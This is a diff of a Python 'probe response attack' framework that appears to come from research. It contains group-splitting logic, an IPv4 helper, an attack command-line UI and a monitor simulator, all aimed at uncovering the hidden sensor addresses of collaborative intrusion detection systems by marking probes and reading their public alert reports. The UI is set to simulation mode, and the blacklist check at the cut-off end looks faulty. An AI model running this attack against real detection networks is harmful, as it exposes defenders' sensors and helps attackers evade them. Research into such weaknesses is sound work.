+			logger.debug("group=%r: response count=%d, target split=%d, responses total=%d" % (group,
+																					group.response_count,
+																					groups_to_resplit[marker][1],
+																					responses_total))
+			"""
+			# create one more subgroup for which no marker is used
+			if self._use_plus1:
+				groups_to_resplit[marker][1] += 1
+
+		# at minimum 2 markers for every group, Robin Hood principle: take from the rich, give to the poor
+		logger.debug("re-distributing marker frequencies (min 2 per group)")
+		self._redistribute_marker_frequencies(groups_to_resplit)
+		"""
+		logger.info("total responses/groups for resplit/marker values: %d/%d/%d" % (
+														responses_total,
+														len(groups_to_resplit),
+														self._marker_value_amount
+														)
+					)
+		"""
+		"""
+		if len(groups_to_resplit) < 20:
+			logger.debug("groups to resplit:")
+
+			for marker, group_freq in groups_to_resplit.items():
+				logger.debug("%s -> %r (max subgroups to be created: %d)" % (marker, group_freq[0], group_freq[1]))
+		"""
+		markervalue_int = 0
+		# sanity check for already stored marker
+		plus1_cnt = 0
+		plus1_cnt_connected = 0
+		subgroup_cnt = 0
+
+		if self._iteration == 1 and len(self._feedback_addresses) != 0:
+			logger.debug("will use feedback addresses for subgrouping")
+		group_miss = 0
+
+		# create subgroups for every top group in the current stage
+		for marker, group_freq in groups_to_resplit.items():
+			# skip group as we don't have enough marker values, try in next iteration
+			if group_freq[1] < 2:
+				# set to 1 to avoid the group being filtered out in the next iteration
+				group_freq[0].response_count = 1
+				subgroup_storage["GROUP_MISS_%d" % group_miss] = group_freq[0]
+				group_miss += 1
+				continue
+
+			feedback_addr = []
+
+			if self._iteration == 1:
+				# marker is actually the target IP address in the first iteration
+				try:
+					feedback_addr = self._feedback_addresses[marker]
+				except KeyError:
+					# no scanner feedback address for this top group; can happen when a
+					# monitor does not answer probes on scanner level
+					#logger.warning("could not find feedback addresses for top group %r" % group_freq)
+					pass
+
+			# split up to group_freq[1] amount of subgroups (stop if single addresses are reached)
+			# "+1" subgroup are automatically created by create_subgroups
+			#logger.debug("creating max %d subgroups" % group_freq[1])
+			# creating 500,000 times 256 subgroups (/24 + 8) takes ~6 minutes
+			subgroups = group_freq[0].create_subgroups(
+				group_freq[1],
+				ipv4_addresses=feedback_addr,
+				use_plus1=self._use_plus1)
+			#logger.debug("subgroup amount for %r: %d" % (group_freq[0], len(subgroups)))
+
+			if self._use_plus1:
+				if not subgroups[-1].is_plus1:
+					logger.warning("????? +1 group missing!!!")
+				else:
+					#logger.debug("---> top/+1 group=%r\t%r" % (group_freq[0], subgroups[-1]))
+					plus1_cnt += 1
+			#logger.debug("first group to resplit is: %r" % subgroups[0])
+			subgroup_cnt += len(subgroups)
+
+			if len(subgroups) > group_freq[1]:
+				logger.warning("group created more subgroubs than it should: %d > %d" %
+							(len(subgroups), group_freq[1]))
+
+			if len(subgroups) == 1:
+				logger.warning("?????? just 1 subgroup? check this! This should have been an identified group, "
+								"parent/subgroup: %r" % subgroups)
+
+			"""
+			logger.debug("creating subgroups for group=%r: marker start/end = %d/%d" % (group_freq[0],
+																group_freq[0].subgroup_start_marker_value_int,
+																group_freq[0].subgroup_end_marker_value_int))
+			"""
+
+			for subgroup in subgroups:
+				if not subgroup.is_plus1:
+					marker_bytes_subgroup = self._create_marker_callback(markervalue_int)
+					subgroup.marker_value_int = markervalue_int
+					subgroup.marker_bytes = marker_bytes_subgroup
+					subgroup_storage[markervalue_int] = subgroup
+
+					#if markervalue_int % 100 == 0:
+					#	logger.debug("encoded marker value: %d -> %r" % (markervalue_int, marker_bytes_subgroup))
+
+					markervalue_int += 1
+					self._addresscount += subgroup.amount_addresses
+				else:
+					marker = b"PLUS1_SUBGROUP" + pack_4bytes(markervalue_int)
+					subgroup_storage[marker] = subgroup
+					group_freq[0].plus1_subgroup = subgroup
+					plus1_cnt_connected += 1
+				# link the subgroup to its top group so responses can be traced back up
+				subgroup.top_group = group_freq[0]
+				# store the group so it can be looked up later on
+
+				if not subgroup.is_plus1:
+					while len(self._group_queue) >= self._group_queue_maxlen:
+						#logger.debug("group handler queue filled, waiting some seconds")
+						time.sleep(1)
+					self._group_queue.append(subgroup)
+
+		logger.debug("finished creating all groups, total=%d, +1 subgroups=%d, +1 subgroups connected=%d, top groups=%d" %
+					(subgroup_cnt, plus1_cnt, plus1_cnt_connected, len(groups_to_resplit)))
+
+		self._feedback_addresses.clear()
+		self._subgrouping_finished = True
+
+	@staticmethod
+	def _redistribute_marker_frequencies(marker_groupfreq):
+		"""
+		Redistribute markers to have at minimum 2 for every position.
+		Input: {a:1, b:999, c:0, ...}
+		Updated: {a:2, b:996, c:2 ...}
+
+		marker_groupfreq -- {marker : (group, amount_subgroups)}
+		The dict is updated in place with min 2 at each position.
+		"""
+		for index in marker_groupfreq.keys():
+			if marker_groupfreq[index][1] < 2:
+				# max_value({a:1, b:999, ...}) -> l=[(b, 999), (a, 1), ...] -> l[0][0]
+				max_index = sorted(marker_groupfreq.items(), key=lambda x: x[1][1], reverse=True)[0][0]
+
+				if marker_groupfreq[max_index][1] <= 2:
+					logger.warning("too low frequencies (1) for re-distributing, not enough marker values? (try more than 8)")
+					break
+
+				adding = 2 - marker_groupfreq[index][1]
+				marker_groupfreq[index][1] += adding
+				marker_groupfreq[max_index][1] -= adding
+
+	@staticmethod
+	def update_plus1_subgroups(top_groups):
+		"""
+		Derive the amount of responses of the "+1" subgroup from the top group and its
+		other subgroups. For iteration index > 1 there has to be a "+1"-group in any case.
+		Top groups which are already identified get discarded.
+		Example:
+		Top-Group = [...] = 6 Responses
+		3 Sub-Groups = [2][1]["+1"-Group]  ...  [4 (group completely identified -> discard)]
+		Updated amount: [2][1][6- (2+1) = 3]
+
+		Behaviour on different response counts (implying +1):
+		Top < sum(Sub): Noise in sub or drop in top -> set +1 to 0
+		Top >= sum(Sub): Update +1 (can be Noise or drop after all but that should be filtered in the next iterations)
+
+		top_groups -- the groups of the iteration BEFORE the most recently created groups.
+		"""
+		logger.debug("updating +1 groups")
+
+		for _, top_group in top_groups.items():
+			# +1 subgroup is None if Top group is an identified group, ignore
+			if top_group.plus1_subgroup is None:
+				continue
+
+			response_sum_subgroups = sum([group.response_count for group in top_group.subgroups])
+			"""
+			logger.debug("top group/responses top/reponses subgroups/top -> sub: plus 1 count: %r / %r / %r / %r" %
+				(top_group, top_group.response_count, response_sum_subgroups, top_group.plus1_subgroup.response_count))
+			"""
+			if response_sum_subgroups > top_group.response_count:
+				logger.warning("new response sum of subgroups greater than response count of top group"
+								"-> assuming noise in new responses OR packet drops in old, setting '+1'-group to 0")
+				# TODO: activate if needed (deactivated to save memory)
+				#top_group.response_discrepancy = top_group.response_count - response_sum_subgroups
+				top_group.plus1_subgroup.response_count = 0
+			else:
+				top_group.plus1_subgroup.response_count = top_group.response_count - response_sum_subgroups
+				#if top_group.plus1_subgroup.response_count != 0:
+				#	logger.debug("found a subgroup having response: %r=%d" % (top_group.plus1_subgroup, top_group.plus1_subgroup.response_count))
+
+	@staticmethod
+	def remove_empty_groups(subgroups):
+		"""
+		Remove all groups having response count of 0.
+		This has to be called AFTER update +1 groups or non empty +1 groups could
+		be removed by mistake otherwise.
+		"""
+		# we can't change a dict while traversing! store keys to be deleted
+		keys_to_remove = [markervalue for markervalue, subgroup in subgroups.items()
+						if subgroup.response_count == 0]
+		for key in keys_to_remove:
+			del subgroups[key]
+		logger.debug("removed empty groups=%d, remaining groups=%d" % (len(keys_to_remove), len(subgroups)))

+ 112 - 0
attack_framework/ipv4.py

@@ -0,0 +1,112 @@
+"""
+This is a highly performance-optimized ipaddress-like module.
+Subnet creation is approximately 50 times faster.
+"""
+from utility import int_to_ip_str, ip_str_to_int
+import logging
+import struct
+import re
+
+split_slash = re.compile("/").split
+
+unpack_ipv4address = struct.Struct(">I").unpack
+pack_ipv4address = struct.Struct(">I").pack
+
+logging.basicConfig(format="%(levelname)s (%(funcName)s): %(message)s")
+logger = logging.getLogger("pra_framework")
+logger.setLevel(logging.DEBUG)
+
+
+class IPv4Address(object):
+	def __init__(self, ip_int=None, ip_bytes=None, ip_str=None):
+		if ip_int is not None:
+			self._ip_int = ip_int
+		elif ip_bytes is not None:
+			self._ip_int = unpack_ipv4address(ip_bytes)[0]
+		elif ip_str is not None:
+			self._ip_int = ip_str_to_int(ip_str)
+
+	packed = property(lambda self: pack_ipv4address(self._ip_int))
+	compressed = property(lambda self: int_to_ip_str(self._ip_int))
+	ip_int = property(lambda self: self._ip_int)
+
+	def __repr__(self):
+		return self.compressed
+
+
+class IPv4Network(object):
+	def __init__(self, nw_ip_int=None, nw_ip_bytes=None, nw_ip_str=None, nw_ip_str_prefix=None, prefixlen=32):
+		if nw_ip_int is not None:
+			self._nw_ip_int = nw_ip_int
+		elif nw_ip_bytes is not None:
+			self._nw_ip_int = unpack_ipv4address(nw_ip_bytes)[0]
+		elif nw_ip_str is not None:
+			self._nw_ip_int = ip_str_to_int(nw_ip_str)
+		elif nw_ip_str_prefix is not None:
+			ip, prefix = split_slash(nw_ip_str_prefix)
+			prefixlen = int(prefix)
+			self._nw_ip_int = ip_str_to_int(ip)
+		self._prefixlen = prefixlen
+
+	prefixlen = property(lambda self: self._prefixlen)
+	ip_int = property(lambda self: self._nw_ip_int)
+
+	def subnets(self, prefixlen_diff):
+		if (self._nw_ip_int << (self._prefixlen + prefixlen_diff) & 0xFFFFFFFF) != 0:
+			raise Exception("Host bits are not empty: %d" %
+							((self._nw_ip_int << (self._prefixlen + prefixlen_diff)) & 0xFFFFFFFF))
+
+		prefixlen_new = self._prefixlen + prefixlen_diff
+
+		if prefixlen_new > 32:
+			raise Exception("32 CIDR bits reached")
+
+		#logger.debug("new subnets: %d, new prefix: %d" % (2**prefixlen_diff, prefixlen_new))
+		nw_add = 2 ** (32 - prefixlen_new)
+		#logger.debug("host bits: %d" % (32 - prefixlen_new))
+		nw_int = self._nw_ip_int
+		return [IPv4Network(nw_ip_int=nw_int + nw_add * x, prefixlen=prefixlen_new) for x in range(2 ** prefixlen_diff)]
+
+	def _get_num_addresses(self):
+		try:
+			return self._host_addresses
+		except AttributeError:
+			host_addresses = 2 ** (32 - self._prefixlen)
+			self._host_addresses = host_addresses
+			return host_addresses
+
+	num_addresses = property(_get_num_addresses)
+
+	def _get_hosts(self):
+		try:
+			host_addresses = self._host_addresses
+		except AttributeError:
+			host_addresses = 2 ** (32 - self._prefixlen)
+			self._host_addresses = host_addresses
+
+		return [pack_ipv4address(ip) for ip in range(self._nw_ip_int, self._nw_ip_int + host_addresses)]
+	# get hosts as packed bytes (including network and broadcast address)
+	hosts = property(_get_hosts)
+
+	def __repr__(self):
+		return self.compressed
+
+	def __contains__(self, other):
+		"""
+		other --  IPv4Address object
+		return -- True if other is contained in this network, False otherwise
+		"""
+		#logger.debug("checking: %r <-> %r" % (self, other))
+		try:
+			host_addresses = self._host_addresses
+		except AttributeError:
+			host_addresses = 2 ** (32 - self._prefixlen)
+			self._host_addresses = host_addresses
+		try:
+			#logger.debug("%d <= %d < %d" % (self._nw_ip_int, other._ip_int, (self._nw_ip_int + host_addresses)))
+			return self._nw_ip_int <= other._ip_int < (self._nw_ip_int + host_addresses)
+		except AttributeError:
+			# only works on IPv4Address
+			return False
+
+	compressed = property(lambda self: int_to_ip_str(self._nw_ip_int) + "/%d" % self._prefixlen)
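+
+# Minimal usage sketch (illustrative only):
+#   nw = IPv4Network(nw_ip_str_prefix="10.0.0.0/24")
+#   nw.subnets(prefixlen_diff=1)            # -> [10.0.0.0/25, 10.0.0.128/25]
+#   IPv4Address(ip_str="10.0.0.5") in nw    # -> True
+#   IPv4Address(ip_str="10.0.0.5").packed   # -> b"\x0a\x00\x00\x05"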

+ 206 - 0
attack_framework/main_attack.py

@@ -0,0 +1,206 @@
+"""
+This module starts the probe response attack UI.
+Use --help to show possible parameters
+"""
+import cmd
+import sys
+import argparse
+import logging
+import os
+import inspect
+import netifaces
+import time
+from report_fetcher import ReportFetcher
+from attack_logic import ProbeResponseAttackLogic
+
+# Logging config
+logging.basicConfig(format="%(levelname)s (%(funcName)s): %(message)s")
+logger = logging.getLogger("pra_framework")
+logger.setLevel(logging.DEBUG)
+
+# TODO: change for testing
+dirname_save = time.strftime("attack_%Y_%m_%d__%H_%M_%S") + "/"
+#dirname_save = "output_dir_testing" + "/"
+
+if not os.path.exists(dirname_save):
+	logging.debug("creating new directory to save results: %s" % dirname_save)
+	try:
+		os.mkdir(dirname_save)
+	except Exception as ex:
+		print(ex)
+# Log to file, logging to console is already enabled
+fileHandler = logging.FileHandler(dirname_save + "/framework.log")
+logFormatter = logging.Formatter("%(asctime)s %(levelname)s (%(funcName)s): %(message)s",
+								datefmt="%d/%m/%Y %I:%M:%S")
+fileHandler.setFormatter(logFormatter)
+logger.addHandler(fileHandler)
+
+
+class AttackUI(cmd.Cmd):
+	"""
+	Command line UI to control the attack framework.
+	"""
+	intro = "\n################################################\n#Welcome to the Probe Response attack framework#\n" \
+			"################################################\nType 'help' for available commands. Use tab for auto-completion."
+	prompt = ">"
+	file = None
+
+	def __init__(self, args):
+		super().__init__()
+		try:
+			# netifaces address family keys: 17 = AF_PACKET (link layer/MAC), 2 = AF_INET (IPv4)
+			mac_iface = netifaces.ifaddresses(args.interface)[17][0]["addr"]
+			ip_for_iface = netifaces.ifaddresses(args.interface)[2][0]["addr"]
+
+			self.attacklogic = ProbeResponseAttackLogic(interface_name=args.interface,
+													ip_src=ip_for_iface,
+													mac_source=mac_iface,
+													mac_gw=args.macgw,
+													rate_kbit_per_s=args.rate,
+													marker_encoding=args.encoding,
+													markerbits_value=args.markervaluebits,
+													markerbits_checksum=args.checksumbits,
+													rate=args.rate,
+													base_dir_save=dirname_save,
+													base_dir_zmap="../zmap",
+													report_fetcher_classname=args.reportfetcherclass,
+													use_feedback_ips=args.usefeedbackips,
+													use_plus1=args.useplus1,
+													is_simulation=True,
+													_ip_stage1="0.0.0.0",
+													_cidr_bits_stage1=0
+													)
+		except Exception as ex:
+			print(ex)
+
+	def do_start(self, arg):
+		"""
+		Start the probe response attack
+		"""
+		logging.info("starting attack")
+		try:
+			self.attacklogic.start()
+		except Exception as ex:
+			print(ex)
+
+	def do_stop(self, arg):
+		"""
+		Stop the probe response attack
+		"""
+		logging.info("stopping attack")
+		self.attacklogic.stop()
+
+	def do_setreportfetcher(self, arg):
+		"""
+		Set a new reportfetcher to fetch report events of the attacked CIDS.
+		"""
+		fetcher_module = __import__("report_fetcher")
+
+		def check(clz):
+			return inspect.isclass(clz) and issubclass(clz, ReportFetcher) and clz != ReportFetcher
+
+		classes = inspect.getmembers(sys.modules["report_fetcher"], check)
+		print("available classes (chose 0-%d):" % (len(classes) - 1))
+
+		for cnt, clz in enumerate(classes):
+			print("%d: %s" % (cnt, clz[1].__name__))
+		try:
+			index = int(input("\nNew report fetcher class: "))
+			self.attacklogic.set_report_fetcher_class(classes[index][0])
+		except:
+			print("did not understand, won't chang anything")
+
+	def do_setrate(self, arg):
+		"""
+		Change the probe rate of the scanner (Kbit/s)
+		"""
+		try:
+			rate = int(input("\nNew attack rate (current: %d):" % self.attacklogic.rate_kbit_per_s))
+			self.attacklogic.rate_kbit_per_s = rate
+		except:
+			print("did not understand, won't chang anything")
+
+	def do_setverbosity(self, arg):
+		"""
+		Change the framework's log verbosity (0=WARNING, 1=INFO, 2=DEBUG)
+		"""
+		try:
+			level = int(input("\nNew log level 0-2:"))
+			levels = [logging.WARNING, logging.INFO, logging.DEBUG]
+			logger.setLevel(levels[level])
+		except:
+			print("did not understand, won't change anything")
+
+	def do_stats(self, arg):
+		"""
+		Show basic statistics about the attack.
+		"""
+		logging.info("Showing statistics:")
+		logger.info("Attack durations, groups, addresses (1st = root, last = identified):")
+		seconds_total = 0
+		identified_group_index = 0
+
+		try:
+			for groupstore in self.attacklogic._iterations:
+				start = groupstore[0][0]
+				end = groupstore[0][1]
+				diff = 0 if end == 0 else (end - start)
+				seconds_total += diff
+				groups = groupstore[2]
+				addresses = groupstore[3]
+				identified_groups = 0
+				identified_addr = 0
+
+				if identified_group_index > 0:
+					try:
+						# group store 2 (iteration) = group handler iteration 1
+						identified_groups = sum([1 for gti in self.attacklogic._grouphandler.identified_groups
+											if gti[2] == identified_group_index])
+						identified_addr = sum([gti[0].amount_addresses for gti in self.attacklogic._grouphandler.identified_groups
+											if gti[2] == identified_group_index])
+					except:
+						pass
+				identified_group_index += 1
+				logger.info("%d -> %d (diff: %d), groups: %d, addresses: %d, identified g: %d, identified a: %d" %
+							(start, end, diff, groups, addresses, identified_groups, identified_addr))
+
+			logger.info("seconds total: %d" % seconds_total)
+			logger.info("probes total: [first iteration] + %d" % self.attacklogic.get_amount_of_probes())
+			logger.info("identified groups: %d" % len(self.attacklogic._grouphandler.identified_groups))
+			logger.info("identified addresses: %d" % sum([gti[0].amount_addresses for gti in self.attacklogic._grouphandler.identified_groups]))
+		except Exception as ex:
+			logger.warning("try again on less activity")
+			logger.warning(ex)
+
+	def do_quit(self, arg):
+		"""
+		Shutdown the attack framework.
+		"""
+		sys.exit(0)
+
+if __name__ == "__main__":
+	parser = argparse.ArgumentParser()
+	parser.add_argument("-i", "--interface", help="Interface to send on packets",
+						required=True)
+	parser.add_argument("-m", "--macgw", help="MAC address of gateway",
+						required=True)
+	parser.add_argument("-r", "--rate", type=int, help="Rate used to send packets (Kbit/s)",
+						default=1000)
+	parser.add_argument("-e", "--encoding", type=int, help="Encoding to be used. Single or bit-OR combination (1=dst port,"
+						"2=src IP, 4=src port)",
+						default=5)
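+	# example: -e 5 = dst port (1) | src port (4), src IP (2) unused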
+	# WARNING: setting marker values too low will make the attack impossible
+	parser.add_argument("-b", "--markervaluebits", type=int, help="Amount of bits to be used for markervalue",
+						default=28)
+	parser.add_argument("-c", "--checksumbits", type=int, help="Amount of bits to be used for checksum",
+						default=4)
+	parser.add_argument("-f", "--reportfetcherclass", help="Name of report fetcher to be used"
+														" (class name contained in report_fetcher.py)",
+						default="TracingReportFetcher")
+	parser.add_argument("-l", "--useplus1", type=bool, help="Use +1 groups",
+						default=False)
+	parser.add_argument("-g", "--usefeedbackips", type=bool, help="Use scanner feedback for group clustering",
+						default=False)
+
+	args = parser.parse_args()
+
+	AttackUI(args).cmdloop()

+ 570 - 0
attack_framework/main_monitor_simulator.py

@@ -0,0 +1,570 @@
+import os
+import logging
+import argparse
+import time
+import socket
+import random
+import requests
+import json
+import struct
+import multiprocessing
+from multiprocessing import Process, Queue
+import re
+from ipv4 import IPv4Address, IPv4Network
+import numpy as np
+
+from pypacker import psocket
+from pypacker import ppcap
+from pypacker.layer12.ethernet import Ethernet
+from pypacker.layer3 import ip
+from pypacker.layer4 import tcp
+
+logging.basicConfig(format="%(levelname)s (%(funcName)s): %(message)s")
+logger = logging.getLogger("pra_framework")
+logger.setLevel(logging.DEBUG)
+
+CURRENT_DIR	= os.path.dirname(os.path.realpath(__file__))
+FILE_NODES	= CURRENT_DIR + "/simulated_nodes.txt"
+
+RESPONSETYPE_NONE		= 0
+RESPONSETYPE_TCP_RST	= 1
+RESPONSETYPE_TCP_SYNACK	= 2
+RESPONSETYPE_ICMP		= 4
+RESPONSETYPES_TCP		= {RESPONSETYPE_TCP_RST, RESPONSETYPE_TCP_SYNACK}
+
+RESPONSE_TYPES_DESCR = {RESPONSETYPE_NONE: "NONE",
+						RESPONSETYPE_TCP_RST: "RST",
+						RESPONSETYPE_TCP_SYNACK: "SYNACK",
+						RESPONSETYPE_ICMP: "ICMP"}
+
+packipv4 = struct.Struct(">I").pack
+split_tab = re.compile("\t").split
+
+#cert = ("ssl/simulator/simulator_cert.pem", "ssl/simulator/simulator_key.pem")
+requests.packages.urllib3.disable_warnings()
+
+
+def store_packets(packets, filename="exception_packets.pcap"):
+	writer = ppcap.Writer(filename=filename)
+	for bts in packets:
+		writer.write(bts)
+	writer.close()
+
+
+class MonitorSimulator(object):
+	"""
+	Simulates monitor nodes on a host system which in turn send attack information to a central CIDS.
+	The simulation can be done using a virtual interface:
+	modprobe dummy (optional if already loaded)
+	ip link set name eth10 dev dummy0
+	ip link show eth10
+	ifconfig eth10 txqueuelen 10000
+
+	Optimization of /etc/sysctl.conf should be done; see the example settings below.
+	"""
+	def __init__(self,
+				# total amount of monitors (monitor_ips + random generated)
+				amount_monitors=10000,
+				cidr_bits=0,
+				# total amount of addresses which give scanner feedback
+				amount_non_monitors=10000,
+				# monitor IP addresses as ["1.2.3.4", ...]
+				monitor_ips=[],
+				seed=123456789,
+				url_tracing="https://localhost:443",
+				interface_name="lo",
+				buffer_size=500000,
+				cluster_monitors=False,
+				# probability that a monitor returns a relevant scanner feedback (RST, SYN/ACK)
+				prop_mon_scannerfeedback=0.8,
+				prop_nwdrop=0.0,
+				file_blacklist=None):
+		logger.debug("monitors=%d, non monitors=%d, scanner feedback=%f, nw drop=%f, cluster=%d" % (amount_monitors,
+																						amount_non_monitors,
+																						prop_mon_scannerfeedback,
+																						prop_nwdrop,
+																						cluster_monitors))
+		self._amount_monitors = amount_monitors
+		self._amount_non_monitors = amount_non_monitors
+		self._prop_mon_scannerfeedback = prop_mon_scannerfeedback
+		self._cluster_monitors = cluster_monitors
+		self._prop_nwdrop = prop_nwdrop
+		self._blacklist_nw_objs = []
+		self._blacklist_int_sub8 = set()
+
+		if file_blacklist is not None:
+			self._blacklist_nw_objs, self._blacklist_int_sub8 = self.read_blacklist(file_blacklist)
+
+		self._rand = random.Random()
+		self._rand.seed(a=seed, version=1)
+		self._rand_nwloss = random.Random()
+		self._rand_nwloss.seed(a=seed, version=1)
+
+		logger.debug("TraCINg url=%s, interface=%s" % (url_tracing, interface_name))
+		logger.debug("Initiating Queue, size: %d" % buffer_size)
+		self._queue = Queue(maxsize=buffer_size)
+		# Group response probabilities
+		self._responsetypes = [
+					RESPONSETYPE_NONE,
+					RESPONSETYPE_TCP_RST,
+					RESPONSETYPE_TCP_SYNACK,
+					RESPONSETYPE_ICMP]
+		self._file_identified_monitors = "./output_dir_testing/identified_monitors.csv"
+		self._listening_ips = {}
+		# TODO: adjust this for different subnets
+		# this has to match _cidr_bits_stage1 in main_attack.py
+		# /0
+		self._host_addresses_mask = 0xFFFFFFFF
+		self._host_addresses_mask >>= cidr_bits
+		logger.debug("Max host IP addresses (host mask): %X" % self._host_addresses_mask)
+		self._initiate_listening_ips(monitor_ips)
+
+		logger.debug("total amount of listening addresses=%d (w/ + w/o feedback)" % len(self._listening_ips))
+		self._sockets_read = []
+		self._sockets_write = []
+		self._is_running = False
+		# TODO: adjust this on other platforms
+		self._read_processes_amount = 2
+		self._read_processes = []
+		socket_read = psocket.SocketHndl(iface_name=interface_name,
+								timeout=10,
+								buffersize_recv=2 ** 29)
+		self._sockets_read.append(socket_read)
+		logger.debug("creating %d processes for reading packets" % self._read_processes_amount)
+
+		for cnt in range(self._read_processes_amount):
+			proc = Process(target=self._packet_collect_cycler, args=(cnt + 1,
+																socket_read,
+																self._queue,
+																self._listening_ips))
+			self._read_processes.append(proc)
+
+		requests_session = requests.Session()
+		#adapter = requests.adapters.HTTPAdapter(pool_connections=10000, pool_maxsize=10000)
+		#requests_session.mount('https://', adapter)
+
+		self._attack_reaction_processes = []
+		# TODO: adjust this on other platforms
+		self._attack_reaction_processes_amount = 5
+
+		logger.debug("creating %d processes for attack reaction" % self._attack_reaction_processes_amount)
+
+		for cnt in range(self._attack_reaction_processes_amount):
+			socket_write = psocket.SocketHndl(iface_name=interface_name,
+								timeout=60 * 60 * 24 * 7,
+								#buffersize_send=2 ** 23)
+								buffersize_send=2 ** 29)
+			self._sockets_write.append(socket_write)
+
+			attack_reaction_process = Process(
+							target=self._attack_reaction_cycler,
+							args=(cnt + 1,
+								socket_write,
+								self._queue,
+								requests_session,
+								url_tracing,
+								self._listening_ips))
+			self._attack_reaction_processes.append(attack_reaction_process)
+
+	def start(self):
+		if self._is_running:
+			return
+		logger.debug("starting collection and reaction logic")
+		self._is_running = True
+
+		for process in self._attack_reaction_processes:
+			process.start()
+
+		time.sleep(2)
+
+		for proc in self._read_processes:
+			proc.start()
+
+	def stop(self):
+		if not self._is_running:
+			return
+		self._is_running = False
+		for sock in self._sockets_read + self._sockets_write:
+			sock.close()
+		self._queue.close()
+
+		for proc in self._read_processes:
+			# don't wait for process to finish, just terminate
+			proc.terminate()
+		for proc in self._attack_reaction_processes:
+			# don't wait for process to finish, just terminate
+			proc.terminate()
+
+	def _initiate_listening_ips(self, monitor_ips):
+		"""
+		Initiate IP addresses which trigger alerts and/or give scanner feedback.
+
+		monitor_ips -- monitor IPs to be added as "a.b.c.d"
+		"""
+		# apply reaction on custom defined monitors
+		if len(monitor_ips) > 0:
+			logger.debug("listening IP addresses were given explicitly, adding %d" % len(monitor_ips))
+
+			# "ip_str" avoids shadowing the pypacker "ip" module imported above
+			for ip_str in monitor_ips:
+				self._listening_ips[IPv4Address(ip_str=ip_str).packed] = [RESPONSETYPE_TCP_RST, True]
+
+		if not self._cluster_monitors:
+			#logger.info("creating %d random IPs" % self._amount_monitors)
+			self._create_random_ips(self._amount_monitors, is_monitor_ip=True)
+		else:
+			#logger.info("creating %d random clustered IPs" % self._amount_monitors)
+			self._create_clustered_monitors(self._amount_monitors)
+
+		logger.debug("total amount of monitors=%d" % len(self._listening_ips))
+
+		if self._amount_non_monitors > 0:
+			# target = current amount + amount of non-monitor IPs
+			target_amount = len(self._listening_ips) + self._amount_non_monitors
+
+			logger.info("creating %d non monitor feedback IPs" % self._amount_non_monitors)
+
+			if target_amount > self._host_addresses_mask:
+				raise Exception("!!!! too many addresses to create! %d >= %d" % (target_amount, self._host_addresses_mask))
+			self._create_random_ips(target_amount, is_monitor_ip=False)
+
+		amount_mon = sum([1 for _, resp_mon in self._listening_ips.items() if resp_mon[1]])
+		amount_nonmon = sum([1 for _, resp_mon in self._listening_ips.items() if not resp_mon[1]])
+		logger.info("sanity check: monitors=%d, non monitors=%d" % (amount_mon, amount_nonmon))
+		self._set_feedback_types()
+
+	def check_matches(self):
+		"""
+		Check if every match in ./output_dir_testing/identified_monitors.csv is
+		really a monitor.
+		"""
+		fd = open(self._file_identified_monitors, "r")
+		monitor_found = 0
+		monitor_false_positive_no_monitor = 0
+		monitor_false_positive_unknown = 0
+		# skip header
+		fd.readline()
+		all_ips = set()
+
+		for line in fd:
+			ip_str = split_tab(line)[0]
+			try:
+				ips = IPv4Network(nw_ip_str_prefix=ip_str).hosts if "/" in line else [IPv4Address(ip_str=ip_str).packed]
+			except TypeError:
+				continue
+			except Exception as ex:
+				logger.warning("something went wrong while checking IP address=%r" % ip_str)
+				print(ex)
+				break
+
+			for ip_bytes in ips:
+				if ip_bytes in all_ips:
+					logger.warning("allready counted, duplicate? from file=%s, converted=%r" %
+									(ip_str, IPv4Address(ip_bytes=ip_bytes)))
+				all_ips.add(ip_bytes)
+				try:
+					assert self._listening_ips[ip_bytes][1] is True
+					monitor_found += 1
+				except KeyError:
+					monitor_false_positive_unknown += 1
+
+					if monitor_false_positive_unknown % 100 == 0:
+						logger.debug("%d: unknown to simulator: %r" % (monitor_false_positive_unknown,
+																	IPv4Address(ip_bytes=ip_bytes)))
+				except AssertionError:
+					monitor_false_positive_no_monitor += 1
+					logger.debug("known to simulator but not a monitor: %r" % IPv4Address(ip_bytes=ip_bytes))
+		logger.info("correctly identified monitors: %d" % monitor_found)
+		logger.info("unknown to simulator (false positive): %d" % monitor_false_positive_unknown)
+		logger.info("found but not monitor (false positive): %d" % monitor_false_positive_no_monitor)
+
+		fd.close()
+
+	def _set_feedback_types(self):
+		"""
+		Set the type of feedback given on scanner level.
+		"""
+		logger.debug("setting feedback types")
+		randrange = self._rand.randrange
+		rand_0_1 = self._rand.random
+
+		for key, _ in self._listening_ips.items():
+			#logger.debug(ip_bytes)
+			# non monitor = give feedback in any case, monitor = feedback based on probability
+			feedback_prop = self._prop_mon_scannerfeedback if self._listening_ips[key][1] else 1.0
+			is_feedback = rand_0_1() <= feedback_prop
+
+			# feedback: RST or SYN/ACK
+			self._listening_ips[key][0] = self._responsetypes[randrange(1, 3)] if is_feedback else RESPONSETYPE_NONE
+
+	@staticmethod
+	def read_blacklist(filename):
+		"""
+		return -- tuple of (list of blacklisted IPv4Network objects, set of their top-8-bit prefixes)
+		"""
+		logger.debug("Reading blacklist from: %s" % filename)
+		addresses_nw_obj = []
+		addresses_int_sub8 = set()
+		total_addresses = 0
+		fd = open(filename, "r")
+
+		for line in fd:
+			try:
+				if line[0] == "#":
+					continue
+				nw = IPv4Network(nw_ip_str_prefix=line)
+				total_addresses += nw.num_addresses
+				addresses_nw_obj.append(nw)
+				addresses_int_sub8.add(nw.ip_int >> 24)
+			except:
+				pass
+
+		fd.close()
+		logger.debug("Blacklist address groups=%d, addresses=%d, sub8=%d" %
+					(len(addresses_nw_obj), total_addresses, len(addresses_int_sub8)))
+		return addresses_nw_obj, addresses_int_sub8
+
+	def _create_random_ips(self, target_amount, is_monitor_ip=True):
+		"""
+		Create random even distributed IP addresses.
+		target_amount -- Add addresses until this size is reached
+		is_monitor_ip -- Add addresses of type monitor if True, add non monitor otherwise
+		"""
+		logger.debug("creating %d random IP addresses, monitor=%r" % (target_amount, is_monitor_ip))
+		randrange = self._rand.randrange
+		rand_0_1 = self._rand.random
+		#feedback_prop = self._prop_mon_scannerfeedback if is_monitor_ip else 1.0
+		cnt = 0
+
+		while len(self._listening_ips) < target_amount:
+			cnt += 1
+			ip_num = randrange(0, self._host_addresses_mask)
+			ip_bytes = packipv4(ip_num)
+
+			# don't overwrite old values
+			#if ip_bytes in self._listening_ips:
+			#	continue
+
+			if (ip_num >> 24) in self._blacklist_int_sub8:
+				#logger.debug("checking: %r" % ip_bytes)
+				for ip_nw in self._blacklist_nw_objs:
+					if ip_num & ip_nw.ip_int == ip_nw.ip_int:
+						#logger.debug("skipping: %r" % ip_nw)
+						continue
+
